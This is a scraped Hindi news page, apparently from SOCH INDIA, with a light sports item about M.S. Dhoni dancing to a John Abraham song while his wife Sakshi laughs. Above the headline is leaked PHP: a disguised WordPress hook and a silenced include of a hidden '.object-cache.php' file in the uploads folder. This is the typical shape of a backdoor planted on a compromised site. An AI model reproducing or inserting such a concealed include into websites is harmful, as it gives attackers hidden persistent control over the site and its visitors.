add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); साक्षी के सामने धोनी ने लगाए ठुमके, नहीं देखा होगा माही का ऐसा अंदाज – SOCH INDIA
Menu

खेल
साक्षी के सामने धोनी ने लगाए ठुमके, नहीं देखा होगा माही का ऐसा अंदाज

nobanner

टीम इंडिया के पूर्व कप्तान महेन्द्र सिंह धोनी के मैदान पर तो आपने कई कारनामें देखें होंगे. उनकी कप्तानी वाले फैसले, विकेट के पीछे बिजली से भी तेज स्टंपिग और ब्लाइंड रन आउट के सभी कायल हैं. हेलीकॉप्टर शॉट पर तो लोग दिल हार जाते हैं. हाल ही में न्यूजीलैंड के खिलाफ दूसरे टी 20 मुकाबले में धोनी के बल्ले से भले ही 49 रन निकले लेकिन भारत को हार मिली और धोनी दिग्गज खिलाड़ियों के निशान पर आ गए. लेकिन अब जो वीडियो सामने आया है उसे देखने के बाद आपको यकीन नहीं होगा कि ये वही माही हैं जो मैदान पर काफी अलग दिखते हैं.

इस वीडियो में धोनी का जो अवतार दिखा है वो सबसे अलग है. ये वीडियो बताता है कि क्यों धोनी को सुपर कूल कहा जाता है. हालांकि इस वीडियो को लेकर कुछ भी ज्यादा जानकारी सामने नहीं आई है इसलिए कहा नहीं जा सकता कि ये वीडियो कब का है और किसने बनाई है.

वीडियो में जो सामने दिखे हैं वो पर्व कप्तान महेन्द्र सिंह धोनी और उनकी पत्नी साक्षी हैं.

धोनी एक गाने पर डांस करते दिख रहे हैं और गाना उनके खास दोस्त जॉन अब्राहम के ऊपर फिलमाया गया था. धोनी जॉन की तरह ही ठुमके लगाने की कोशिश कर रहे हैं और साक्षी उन्हें देखकर लोट पोट हुई जा रही है.